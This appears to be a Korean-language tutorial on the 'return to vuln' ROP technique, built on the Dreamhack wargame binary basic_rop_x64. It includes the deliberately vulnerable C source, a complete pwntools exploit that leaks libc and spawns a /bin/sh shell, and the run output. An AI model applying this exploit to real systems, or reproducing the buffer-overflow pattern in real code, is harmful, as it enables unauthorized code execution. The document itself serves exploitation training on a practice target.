Return to vuln

Return to vuln

Return to vuln 기법은 ROP 코드를 실행한 후 취약성이 있는 코드로 다시 돌아오는 기법을 말합니다. 이 기법을 사용하면 Got Overwrite를 하지 않아도 되서 Full RELRO가 걸려있어도 익스플로잇이 가능합니다.

실습 코드 (Dreamhack-basic_rop_x64)

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

int main(int argc, char *argv[]) {
    char buf[0x40] = {};

    initialize();

    read(0, buf, 0x400);
    write(1, buf, sizeof(buf));

    return 0;
}

익스플로잇 계획

1. libc base Leak
	1-1. system 함수 실제 주소 얻기
    1-2. "/bin/sh" 실제 주소 얻기
2. Return to vuln
3. system("/bin/sh") 

익스플로잇 코드

from pwn import *

def slog(name, addr):
        return success(": ".join([name, hex(addr)]))


p = process("./basic_rop_x64")
e = ELF("./basic_rop_x64", checksec=False)
libc = e.libc
r = ROP(e)

#context.log_level = 'debug'

puts_plt = e.plt['puts']
read_got = e.got['read']

read_offset = libc.symbols['read']
system_offset = libc.symbols['system']
binsh_offset = list(libc.search(b"/bin/sh"))[0]

main = e.symbols['main']
ret = r.find_gadget(['ret'])[0]
pop_rdi = r.find_gadget(['pop rdi', 'ret'])[0]

payload = b'A' * 72


# puts(read@got)
payload += p64(pop_rdi) + p64(read_got)
payload += p64(puts_plt)


# return to vuln
payload += p64(main)


p.send(payload)

p.recvuntil(b'A' * 64)
read = u64(p.recvn(6)+b'\x00'*2)
lb = read - read_offset
system = lb + system_offset
binsh = lb + binsh_offset

slog("read", read)
slog("libc base", lb)
slog("system", system)
slog("/bin/sh", binsh)

payload = b'A' * 72

# system("/bin/sh")
payload += p64(ret)
payload += p64(pop_rdi) + p64(binsh)
payload += p64(system)

p.send(payload)
p.recvuntil(b'A' * 64)

p.interactive()

익스플로잇

$ python3 rtv.py
[+] Starting local process './basic_rop_x64': pid 455
[*] '/home/ion/wargame/basic_rop_x64/basic_rop_x64'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/lib/x86_64-linux-gnu/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Loaded 14 cached gadgets for './basic_rop_x64'
[+] read: 0x7fec739dd020
[+] libc base: 0x7fec738cd000
[+] system: 0x7fec7391c420
[+] /bin/sh: 0x7fec73a80d88
[*] Switching to interactive mode
$